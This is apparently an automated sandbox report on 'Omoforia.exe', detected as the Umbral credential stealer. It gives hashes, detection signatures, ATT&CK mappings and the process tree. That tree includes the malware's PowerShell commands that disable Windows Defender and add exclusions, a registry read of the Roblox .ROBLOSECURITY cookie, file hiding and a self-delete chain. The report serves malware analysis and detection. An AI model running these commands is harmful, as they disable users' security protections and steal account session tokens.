Analysis

  • max time kernel
    92s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-06-2024 17:56

General

  • Target

    Omoforia.exe

  • Size

    216KB

  • MD5

    512441160e210a7696cc24bb5b07ebab

  • SHA1

    ce8d0012808448dc249b6376a715e16400b7ead4

  • SHA256

    319e8877d90fd746f2d47b0f713d1bd594c1b5973b4ffd8e03f881509964db5d

  • SHA512

    4a60c13bbdaf63b4dd64706d9278e6a3a4b59c43ec8482fbcdbd1075af355f34ea45e9b57f31718dd8c7f1f9328fa3cbf132e2080dc16a245335fb71c3952146

  • SSDEEP

    3072:JmpcjvqySgPAb+D9Cocawot18PeXdJBJg3plgsLSl8eN7s8m+XPcGTSYW:0cWoPAiRrt18aPJei8eNY8mWpS

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Omoforia.exe
    "C:\Users\Admin\AppData\Local\Temp\Omoforia.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2856
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2904
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Omoforia.exe"
      2⤵
      • Views/modifies file attributes
      PID:3660
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Omoforia.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2092
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4704
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:748
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3292
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:4856
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:1752
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1228
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:2836
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Omoforia.exe" && pause
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2364
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • Runs ping.exe
            PID:2528

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Defense Evasion

      Hide Artifacts

      1
      T1564

      Hidden Files and Directories

      1
      T1564.001

      Credential Access

      Unsecured Credentials

      1
      T1552

      Credentials In Files

      1
      T1552.001

      Discovery

      System Information Discovery

      1
      T1082

      Remote System Discovery

      1
      T1018

      Collection

      Data from Local System

      1
      T1005

      Command and Control

      Web Service

      1
      T1102

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        440cb38dbee06645cc8b74d51f6e5f71

        SHA1

        d7e61da91dc4502e9ae83281b88c1e48584edb7c

        SHA256

        8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

        SHA512

        3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        c493263bea895bb9204bea923c7ec4d7

        SHA1

        5ca8c342d7dea33a8da8dd3218e16ee77a8f4231

        SHA256

        49f79e04b40ef149868dfb4526f6d33bf43a33f85d350f710fd99320f59b78d1

        SHA512

        b0238cd51a8284168447ec5ab93b1b3d88cfa3f23225551c1ed6551a72dd72aaed970760d2cea8cd34582f9b56f3cdb3c3dc027f28896f4b111b06332796f6bd

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        948B

        MD5

        efe05055dc30f1da03bd1653594f8b0a

        SHA1

        8650a67ec9d1b8eed7caa4e4c86ebb8531bc7ba2

        SHA256

        10b3d946f07601b28c5cd6ee36fd0fffb41f3d96094a478d088ce30ebf9a694d

        SHA512

        5096856b34336cafbd2ee4dc4709bfa39c8794d8fc42777a460b79d52482b699013f237dfee2ecaf2b21487cc933b807bc5bad9b81f7070ba0dc4f6efcfa2f36

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        276798eeb29a49dc6e199768bc9c2e71

        SHA1

        5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

        SHA256

        cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

        SHA512

        0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        ac057a92f4b62d8880169af0693ef5b2

        SHA1

        66e7c7834c5dae5cec863ccd69403150d05841f4

        SHA256

        7cef55990e8e6cfe07e1965b303e79ac562cdc128ab82edf480d9873f72bb3ed

        SHA512

        d525f47da9e61fc87e55aca6b34e776be3ed081b719bbbb5256705a6afe5fdd4c16d5ee595af13994e2718f789f5fd32830331347d97b029c031c9dfe30c7f49

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dxntlzc1.p4o.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/2092-4-0x00007FF815840000-0x00007FF816301000-memory.dmp
        Filesize

        10.8MB

      • memory/2092-5-0x00007FF815840000-0x00007FF816301000-memory.dmp
        Filesize

        10.8MB

      • memory/2092-15-0x0000023144CA0000-0x0000023144CC2000-memory.dmp
        Filesize

        136KB

      • memory/2092-18-0x00007FF815840000-0x00007FF816301000-memory.dmp
        Filesize

        10.8MB

      • memory/2092-3-0x00007FF815840000-0x00007FF816301000-memory.dmp
        Filesize

        10.8MB

      • memory/2856-33-0x0000011DD39D0000-0x0000011DD3A20000-memory.dmp
        Filesize

        320KB

      • memory/2856-32-0x0000011DD3A20000-0x0000011DD3A96000-memory.dmp
        Filesize

        472KB

      • memory/2856-34-0x0000011DD39A0000-0x0000011DD39BE000-memory.dmp
        Filesize

        120KB

      • memory/2856-1-0x0000011DB9300000-0x0000011DB933C000-memory.dmp
        Filesize

        240KB

      • memory/2856-0-0x00007FF815843000-0x00007FF815845000-memory.dmp
        Filesize

        8KB

      • memory/2856-70-0x0000011DD3C60000-0x0000011DD3C6A000-memory.dmp
        Filesize

        40KB

      • memory/2856-71-0x0000011DD3DB0000-0x0000011DD3DC2000-memory.dmp
        Filesize

        72KB

      • memory/2856-2-0x00007FF815840000-0x00007FF816301000-memory.dmp
        Filesize

        10.8MB

      • memory/2856-89-0x0000011DD3AA0000-0x0000011DD3C49000-memory.dmp
        Filesize

        1.7MB

      • memory/2856-90-0x00007FF815840000-0x00007FF816301000-memory.dmp
        Filesize

        10.8MB